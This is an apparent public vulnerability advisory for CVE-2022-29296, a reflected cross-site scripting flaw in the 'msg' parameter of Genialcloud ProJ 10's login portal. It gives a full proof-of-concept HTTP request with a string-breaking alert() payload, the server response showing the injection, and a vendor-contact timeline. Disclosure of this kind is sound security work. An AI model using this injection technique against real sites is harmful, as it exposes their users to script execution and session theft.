# Exploit Title: Avantune Genialcloud ProJ 10 - Reflected XSS (Cross-Site Scripting)  
# Date: 2022-06-01  
# Exploit Author: Andrea Intilangelo  
# Vendor Homepage:  
# Software Link: - -  
# Version: 10  
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 100.0, Microsoft Edge 101.0.1210.39)  
# CVE: CVE-2022-29296  
Reflected Cross-Site Scripting (XSS) vulnerability in login-portal webpage of Genialcloud ProJ (and potentially in other platforms from the  
same software house "Avantune" since codebase seems shared with their other products: Facsys and Analysis) allows remote attacker to inject  
and execute arbitrary web scripts or HTML via a crafted payload.  
Request parameters affected is "msg".  
PoC Request:  
GET /eportal/?nologon=1&msg=Invalid%20username%20or%20password%27%3Balert%28%22y0%21+XSS+here+%3A%29%22%29%2F%2F HTTP/1.1  
Host: [REDACTED]  
Cookie: ASP.NET_SessionId=3recnmmlpo1glzzyejdoezk2  
Upgrade-Insecure-Requests: 1  
Accept-Encoding: gzip, deflate  
Accept: */*  
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36  
Connection: close  
Cache-Control: max-age=0  
PoC Response:  
HTTP/1.1 200 OK  
Cache-Control: private  
Content-Type: text/html; charset=utf-8  
Server: Microsoft-IIS/10.0  
X-AspNet-Version: 4.0.30319  
X-Powered-By: ASP.NET  
Date: Wed, 11 May 2022 10:51:10 GMT  
Connection: close  
Content-Length: 8162  
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">  
<html xmlns="">  
<head><link rel="stylesheet"  
<script type="text/javascript"> var Msg = 'Invalid username or password';alert("y0! XSS here :)")//';</script>  
2022-01-05: Vulnerability discovered.  
2022-01-06: Vendor contacted.  
2022-02-07: No reply, vendor contacted for 2nd time.  
2022-02-10: Request for CVE reservation.  
2022-04-16: Assigned CVE number CVE-2022-29296.  
2022-05-07: No reply, vendor contacted for 3rd time.  
2022-06-01: Public disclosure.  
PoC Screenshots: